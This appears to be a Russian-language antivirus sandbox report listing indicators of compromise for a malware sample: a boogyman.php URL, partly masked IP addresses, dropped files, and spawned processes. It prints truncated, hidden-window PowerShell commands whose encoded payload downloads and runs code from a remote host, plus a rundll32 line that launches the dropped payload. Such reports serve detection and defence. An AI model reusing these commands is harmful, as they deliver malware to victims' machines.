Техническая информация
- http://46.#.19.136/boogyman.php
- <SYSTEM32>\wermgr.exe
- %WINDIR%\syswow64\cmd.exe
- %TEMP%\rmejgz.bin
- '46.#.19.136':80
- '10#.#45.146.219':80
- '74.##.157.139':443
- '38.##0.103.124':443
- 'microsoft.com':80
- '68.##.26.182':443
- '38.##0.103.124':443
- DNS ASK microsoft.com
- '<SYSTEM32>\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8ANAA2...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8ANAA2...
- '<SYSTEM32>\rundll32.exe' %TEMP%\RMEjgz.bin StartW
- '<SYSTEM32>\wermgr.exe'